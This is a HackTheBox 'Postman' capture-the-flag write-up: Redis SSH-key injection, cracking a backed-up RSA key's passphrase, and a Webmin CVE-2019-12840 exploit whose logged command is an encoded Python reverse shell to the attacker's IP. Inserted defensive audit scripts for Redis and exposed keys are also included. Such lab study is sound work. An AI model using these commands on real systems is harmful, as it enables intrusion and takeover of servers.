HTB Linux Postman

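Introduction
Initial access is gained through unauthenticated access to Redis. From there, a backup file leads to root, either directly or by first obtaining the Matt account and then escalating to root.

Target status: rooted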

Information gathering

Port scan

$ cat scan/Postman-vuln.nmap
# Nmap 7.70 scan initiated Tue Dec 17 21:09:32 2019 as: nmap -sC -sV -p22,80,6379,10000 --script vuln -oA scan/Postman-vuln 10.10.10.160
Nmap scan report for postman (10.10.10.160)
Host is up (0.38s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-sql-injection:
| Possible sqli for queries:
| http://postman:80/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://postman:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://postman:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://postman:80/js/?C=S%3bO%3dA%27%20OR%20sqlspider
|_ http://postman:80/js/?C=N%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <h1>Error - Document follows</h1>
|_<p>This web server is running in SSL mode. Try the URL <a href='https://Postman:10000/'>https://Postman:10000/</a> instead.<br></p>
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 17 21:23:06 2019 -- 1 IP address (1 host up) scanned in 814.50 seconds

TCP ports and services:

  • Port 22, SSH, version: OpenSSH 7.6p1
  • Port 80, HTTP, version: Apache httpd 2.4.29 (Ubuntu)
  • Port 6379, Redis, version: Redis key-value store 4.0.9
  • Port 10000, HTTP, version: MiniServ 1.910 (Webmin httpd)

Redis and Webmin are the primary targets.

User:redis

View the contents of the redis_rce file: cat redis_rce.sh (run on Kali as root)

# Create a fresh key pair on the local host (this deletes any existing id* keys)
rm -rf ~/.ssh/id*
ssh-keygen -t rsa
# Pad the public key with blank lines so it sits on its own line inside the dump file
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > owef_ssh.txt
redis-cli -h 10.10.10.160 flushall
cat owef_ssh.txt | redis-cli -h 10.10.10.160 -x set s-key
# Redirect the dump file to the redis user's authorized_keys and write it
redis-cli -h 10.10.10.160 config set dir "/var/lib/redis/.ssh/"
redis-cli -h 10.10.10.160 config get dir
redis-cli -h 10.10.10.160 config set dbfilename authorized_keys
redis-cli -h 10.10.10.160 save
chmod 600 ~/.ssh/id_rsa
ssh -i ~/.ssh/id_rsa redis@10.10.10.160

Running the redis_rce.sh script directly gives initial access as the redis user.

Tips:

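For some ideas on Redis, see hacktricks.xyz: 6379-pentesting-redis. In short, the redis user's home directory may be "/home/redis" or "/var/lib/redis", so there is no need to enumerate files under /home here; the SSH public key can be written directly to "/var/lib/redis/.ssh/".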
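
An added example, not part of the original write-up: defender-side checks for the condition used above. It audits a redis.conf for a passwordless, non-loopback listener with CONFIG still available, and tests whether an authorized_keys file is really an RDB dump. The function names, finding labels and sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: defender-side checks for the Redis authorized_keys write.

# conf_value FILE KEY -> last value set for directive KEY ("" if absent)
conf_value() {
    awk -v k="$2" 'tolower($1) == k { $1 = ""; sub(/^ +/, ""); v = $0 }
                   END { print v }' "$1"
}

# audit_redis_conf FILE -> space-separated findings, empty when none
audit_redis_conf() {
    findings="" exposed=no
    bind=$(conf_value "$1" bind)
    [ -z "$(conf_value "$1" requirepass)" ] && findings="$findings no-requirepass"
    if [ -z "$bind" ]; then
        # Without an explicit bind, only protected mode keeps remote clients out.
        [ "$(conf_value "$1" protected-mode)" = no ] && exposed=yes
    else
        for addr in $bind; do
            case $addr in 127.*|::1|-::1) ;; *) exposed=yes ;; esac
        done
    fi
    [ "$exposed" = yes ] && findings="$findings non-loopback-listener"
    # CONFIG SET dir/dbfilename is what redirects the dump file.
    grep -qiE '^[[:space:]]*rename-command[[:space:]]+config[[:space:]]' "$1" ||
        findings="$findings config-command-enabled"
    echo "${findings# }"
}

# is_rdb_dump FILE -> exit 0 when FILE begins with the RDB magic "REDIS"
is_rdb_dump() {
    [ -f "$1" ] && [ "$(dd if="$1" bs=5 count=1 2>/dev/null)" = REDIS ]
}

# Constructed sample data (not taken from the target host).
tmp=$(mktemp -d)
printf 'bind 0.0.0.0\nprotected-mode no\n' > "$tmp/weak.conf"
printf 'bind 127.0.0.1 ::1\nrequirepass "constructed-secret"\nrename-command CONFIG ""\n' > "$tmp/hard.conf"
printf 'REDIS0008\372\n\nssh-rsa AAAA-constructed\n\n' > "$tmp/dumped_keys"
printf 'ssh-rsa AAAA-constructed admin@example\n' > "$tmp/clean_keys"
echo "weak.conf: $(audit_redis_conf "$tmp/weak.conf")"
echo "hard.conf: $(audit_redis_conf "$tmp/hard.conf")"
for f in dumped_keys clean_keys; do
    if is_rdb_dump "$tmp/$f"; then echo "$f: RDB dump"; else echo "$f: ok"; fi
done
rm -rf "$tmp"
```

On a real host the two functions would be pointed at the service's own redis.conf and at each account's ~/.ssh/authorized_keys, including the service account's home directory.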

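After obtaining the redis user, gather information.

Information gathering

Check the kernel version

Check the sudoers configuration

Check the passwd file for other users: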

$ cat /etc/passwd
redis@Postman:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
< ... >
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash

List the root directory and look for the directories most likely to hold sensitive files:

redis@Postman:~$ ls -l /
total 483892
drwxr-xr-x 2 root root 4096 Aug 25 17:39 bin
drwxr-xr-x 3 root root 4096 Aug 24 11:35 boot
drwxr-xr-x 18 root root 3860 Jan 19 14:38 dev
drwxr-xr-x 81 root root 4096 Oct 25 16:44 etc
drwxr-xr-x 3 root root 4096 Sep 11 11:27 home
lrwxrwxrwx 1 root root 33 Aug 24 11:28 initrd.img -> boot/initrd.img-4.15.0-58-generic
lrwxrwxrwx 1 root root 33 Aug 24 11:28 initrd.img.old -> boot/initrd.img-4.15.0-58-generic
drwxr-xr-x 18 root root 4096 Oct 25 16:44 lib
drwxr-xr-x 2 root root 4096 Aug 24 11:25 lib64
drwx------ 2 root root 16384 Aug 24 11:21 lost+found
drwxr-xr-x 2 root root 4096 Aug 24 11:21 media
drwxr-xr-x 2 root root 4096 Aug 24 11:24 mnt
drwxr-xr-x 2 root root 4096 Sep 11 11:28 opt
dr-xr-xr-x 109 root root 0 Jan 19 14:37 proc
drwx------ 8 root root 4096 Oct 25 16:44 root
drwxr-xr-x 20 root root 580 Jan 19 15:05 run
drwxr-xr-x 2 root root 4096 Oct 25 16:38 sbin
drwxr-xr-x 2 root root 4096 Aug 24 11:24 srv
-rw------- 1 root root 495416320 Aug 24 11:21 swapfile
dr-xr-xr-x 13 root root 0 Jan 19 14:56 sys
drwxrwxrwt 12 root root 4096 Jan 19 15:02 tmp
drwxr-xr-x 10 root root 4096 Aug 24 11:24 usr
drwxr-xr-x 13 root root 4096 Aug 25 18:24 var
lrwxrwxrwx 1 root root 30 Aug 24 11:28 vmlinuz -> boot/vmlinuz-4.15.0-58-generic
lrwxrwxrwx 1 root root 30 Aug 24 11:28 vmlinuz.old -> boot/vmlinuz-4.15.0-58-generic
-rw-r--r-- 1 root root 2086 Aug 25 17:26 webmin-setup.out

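Directories most likely to hold sensitive files: /etc, /home, /lost+found, /media, /opt, /root, /srv, /var.

Find files readable by the redis user:

Search for backup files (the search command was found under the webmin directory): find / -name '*bak*' -type f 2>/dev/null. This finds the file /opt/id_rsa.bak.

View the contents of id_rsa.bak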

redis@Postman:~$ ls /opt
id_rsa.bak
redis@Postman:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

< ... >
-----END RSA PRIVATE KEY-----

Convert it to john format and crack it

root@owefsad:~# cat postman.id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
< ... >
-----END RSA PRIVATE KEY-----

Convert to john format with ssh2john

$ python /usr/share/john/ssh2john.py postman.id_rsa > postman.id_rsa.hash

$ cat postman.id_rsa.hash
postman.id_rsa:$sshng$0$8$73E9CEFBCCF5287C$1192$< ... >

Crack the id_rsa file to obtain its passphrase: computer2008

root@owefsad:~# john --format=SSH --wordlist=/usr/share/wordlists/rockyou.txt postman.id_rsa.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (postman.id_rsa)
1g 0:00:00:12 DONE (2020-01-19 01:55) 0.07968g/s 1142Kp/s 1142Kc/s 1142KC/sa6_123..*7¡Vamos!
Session completed
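
An added example, not part of the original write-up: a defender-side audit for the condition exploited above, a private-key copy that other accounts can read and that is protected only by legacy PEM encryption. The function names, finding labels and sample files are constructed for illustration, and the key bodies are placeholders.

```shell
#!/bin/sh
# Added example: audit a directory tree for exposed private-key copies.

# key_findings FILE -> space-separated findings for one private-key file
key_findings() {
    out=""
    # Group/other read access lets any local account copy the key for offline guessing.
    [ -n "$(find "$1" -prune \( -perm -040 -o -perm -004 \))" ] &&
        out="$out readable-by-others"
    if grep -q '^-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        out="$out openssh-format"
    elif grep -q '^-----BEGIN ENCRYPTED PRIVATE KEY-----' "$1"; then
        out="$out pkcs8-encrypted"
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        # Legacy PEM: key derived from the passphrase by salted MD5, iteration count 1.
        out="$out legacy-pem-md5-kdf"
    else
        out="$out unencrypted-pem"
    fi
    echo "${out# }"
}

# audit_keys DIR -> one "path: findings" line per file holding a private key
audit_keys() {
    find "$1" -type f -exec grep -l -e '-----BEGIN .*PRIVATE KEY-----' {} + 2>/dev/null |
    while IFS= read -r f; do
        echo "$f: $(key_findings "$f")"
    done
}

# Constructed sample tree; the key bodies are placeholders, not real keys.
tmp=$(mktemp -d)
mkdir -p "$tmp/opt" "$tmp/home/.ssh"
printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: DES-EDE3-CBC,0000000000000000' '' 'constructed' \
    '-----END RSA PRIVATE KEY-----' > "$tmp/opt/id_rsa.bak"
printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed' \
    '-----END OPENSSH PRIVATE KEY-----' > "$tmp/home/.ssh/id_ed25519"
echo 'not a key' > "$tmp/opt/notes.txt"
chmod 644 "$tmp/opt/id_rsa.bak"
chmod 600 "$tmp/home/.ssh/id_ed25519"
audit_keys "$tmp"
rm -rf "$tmp"
```

A key flagged legacy-pem-md5-kdf can be rewritten in the OpenSSH format with a bcrypt KDF using ssh-keygen -p -o -a 100 -f <keyfile>, and a stray readable copy should be deleted rather than re-encrypted.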

User:Matt

1. Logging in over SSH with the credentials Matt / computer2008 fails.
2. Switching from the redis user to Matt with su succeeds.

redis@Postman:~$ su Matt
Password:
Matt@Postman:/var/lib/redis$ sudo -l
[sudo] password for Matt:
Sorry, user Matt may not run sudo on Postman.
Matt@Postman:/var/lib/redis$ cd
Matt@Postman:~$ ls
user.txt
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c

Priv: root

Log in to Webmin with the account Matt / computer2008, then use Webmin's "'Package Updates' Remote Command Execution" vulnerability to run system commands and get a reverse shell.

# Get a reverse shell
$ python CVE-2019-12840.py -u https://10.10.10.160 -U Matt -P computer2008 -lhost 10.10.15.80 -lport 4444

_______ ________ ___ ___ __ ___ __ ___ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |__ \ / _ \| || | / _ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | ) | (_) | || |_| | | |
| | \ \/ / | __|______/ /| | | || |\__, |______| | / / > _ <|__ _| | | |
| |____ \ / | |____ / /_| |_| || | / / | |/ /_| (_) | | | | |_| |
\_____| \/ |______| |____|\___/ |_| /_/ |_|____|\___/ |_| \___/

by KrE80r

Webmin <= 1.910 RCE (Authorization Required)

usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -c "id"
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -lhost <LOCAL_IP> -lport 443


[*] logging in ...

[+] got sid 0cda096ebb0f458d4a0a34d7e5182659

[*] sending command python -c "import base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE1LjgwIiw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ=='))"

Got a root shell

nc -lv 4444
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls
redis-5.0.0
root.txt
# cat root.txt
a257741c5bed8be7778c6ed95686ddce

Root access obtained.
